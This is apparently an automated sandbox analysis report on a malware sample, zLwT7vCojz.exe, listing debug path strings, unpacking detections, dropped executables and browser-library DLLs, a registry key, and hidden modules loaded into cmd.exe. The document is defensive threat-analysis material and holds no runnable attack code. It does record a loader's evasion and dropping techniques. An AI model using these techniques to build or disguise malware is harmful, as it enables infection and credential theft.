Source:	Binary string: wntdll.pdb source: Qg_Appv5.exe, 0000000D.00000002.1448048593.0000000005170000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1426785944.0000000003140000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1386928542.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388922444.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475980703.0000000003828000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1477591260.0000000003B80000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1480438511.000000000403F000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713172266.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713421487.00000000053D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb\| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: mozglue.pdb source: u48o.0.exe, 0000000A.00000002.1716466376.000000006C26D000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: Qg_Appv5.exe, 0000000D.00000002.1455543827.000000000701F000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1385724944.00000000009AC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000000.1373724889.00000000009AC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000014.00000000.1384104733.0000000000A3C000.00000002.00000001.01000000.00000010.sdmp, UniversalInstaller.exe, 00000014.00000002.1472732421.0000000000A3C000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2675924617.00000256731F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: y:C:\xinosa dulicados52\vogewaxupi\gixugajipak20\n.pdb source: zLwT7vCojz.exe, 00000000.00000003.1290625421.0000000005EB1000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000000.1288578944.000000000040F000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UIxMarketPlugin.pdb source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000006E8E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2515162487.00000256581F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000006B80000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1389721607.000000006C947000.00000002.00000001.01000000.0000000F.sdmp, UniversalInstaller.exe, 00000014.00000002.1484091250.000000006C947000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\yokirew38_tidamikip hopoyura.pdb source: zLwT7vCojz.exe, 00000000.00000002.1558401422.00000000043E6000.00000004.00000020.00020000.00000000.sdmp, zLwT7vCojz.exe, 00000000.00000000.1249880380.000000000040F000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2516504389.00000256583D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\xinosa dulicados52\vogewaxupi\gixugajipak20\n.pdb source: zLwT7vCojz.exe, 00000000.00000003.1290625421.0000000005EB1000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000000.1288578944.000000000040F000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2515303312.0000025658200000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2516000177.00000256583C0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2515303312.0000025658200000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2516000177.00000256583C0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: wntdll.pdbUGP source: Qg_Appv5.exe, 0000000D.00000002.1448048593.0000000005170000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1426785944.0000000003140000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1386928542.00000000030B2000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388922444.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475980703.0000000003828000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1477591260.0000000003B80000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1480438511.000000000403F000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713172266.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713421487.00000000053D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676321887.0000025673230000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2620487343.0000025669C2C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: nss3.pdb source: u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: 0C:\yokirew38_tidamikip hopoyura.pdb source: zLwT7vCojz.exe, 00000000.00000002.1558401422.00000000043E6000.00000004.00000020.00020000.00000000.sdmp, zLwT7vCojz.exe, 00000000.00000000.1249880380.000000000040F000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Unpacked PE file: 0.2.zLwT7vCojz.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Unpacked PE file: 10.2.u48o.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Unpacked PE file: 0.2.zLwT7vCojz.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Unpacked PE file: 10.2.u48o.0.exe.400000.0.unpack

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe

Code function: 10_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

10_2_00416240

Source: relay.dll.13.dr	Static PE information: real checksum: 0x18dd31 should be: 0x191202
Source: pfswlxy.22.dr	Static PE information: real checksum: 0x0 should be: 0xc94c3
Source: relay.dll.18.dr	Static PE information: real checksum: 0x18dd31 should be: 0x191202
Source: zLwT7vCojz.exe	Static PE information: real checksum: 0x79e57 should be: 0x79e5d

Source: u48o.1.exe.0.dr	Static PE information: section name: .didata
Source: Qg_Appv5.exe.0.dr	Static PE information: section name: .didata
Source: freebl3.dll.10.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.10.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.10.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.10.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.10.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.10.dr	Static PE information: section name: .didat
Source: nss3.dll.10.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.10.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.10.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.10.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0042D355 push esi; ret	0_2_0042D35E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_00409D06 push ecx; ret	0_2_00409D19
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_004275A4 push eax; ret	0_2_004275C2
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_004097B6 push ecx; ret	0_2_004097C9
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_04341CA2 push dword ptr [esp+ecx-75h]; iretd	0_2_04341CA6
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0433C52F push esp; retf	0_2_0433C537
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_04329F6D push ecx; ret	0_2_04329F80
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0434780B push eax; ret	0_2_04347829
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_04329A1D push ecx; ret	0_2_04329A30
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0433CB2D push esp; retf	0_2_0433CB2E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_043B34F0 push ebp; iretd	0_2_043B3523
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_043B1767 push 2B991403h; ret	0_2_043B176E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_043B208C push 00000061h; retf	0_2_043B2094
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_043AF1CE pushad ; retf	0_2_043AF1CF
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_043B1A7D pushad ; retf	0_2_043B1A84
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_043B0258 push ecx; iretd	0_2_043B026A
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_004176C5 push ecx; ret	10_2_004176D8
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C22B536 push ecx; ret	10_2_6C22B549
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Code function: 13_2_0043FA1C push ecx; mov dword ptr [esp], edx	13_2_0043FA1E
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Code function: 13_2_00412A45 push edx; ret	13_2_00412A94
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Code function: 13_2_0041264E push ebx; ret	13_2_0041266C
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Code function: 13_2_00412E53 push ecx; ret	13_2_00412E54
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Code function: 13_2_00412E55 push es; iretd	13_2_00412E62
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Code function: 13_2_00412C5B push edx; ret	13_2_00412C5C
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Code function: 13_2_00412E63 push ebx; ret	13_2_00412E6C
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Code function: 13_2_0041266D push es; ret	13_2_0041267A
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Code function: 13_2_00412E6D push edx; ret	13_2_00412E78
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Code function: 13_2_00412E7E push edx; ret	13_2_00412E80
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Code function: 13_2_00412A01 push edx; ret	13_2_00412A14
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Code function: 13_2_00412609 push edi; ret	13_2_00412614
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Code function: 13_2_00412C09 push ebx; ret	13_2_00412C1C

Source: pfswlxy.22.dr

Static PE information: section name: .text entropy: 6.816878789485625

Source: C:\Users\user\Desktop\zLwT7vCojz.exe	File created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	File created: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Jump to dropped file
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	File created: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\pfswlxy	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	File created: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\wyftaheq	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	File created: C:\Users\user\AppData\Roaming\driverRemote_debug\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	File created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	File created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	File created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	File created: C:\Users\user\AppData\Roaming\driverRemote_debug\relay.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\pfswlxy			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\wyftaheq			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PFSWLXY
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WYFTAHEQ

Source: C:\Users\user\Desktop\zLwT7vCojz.exe

Code function: 0_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00408761

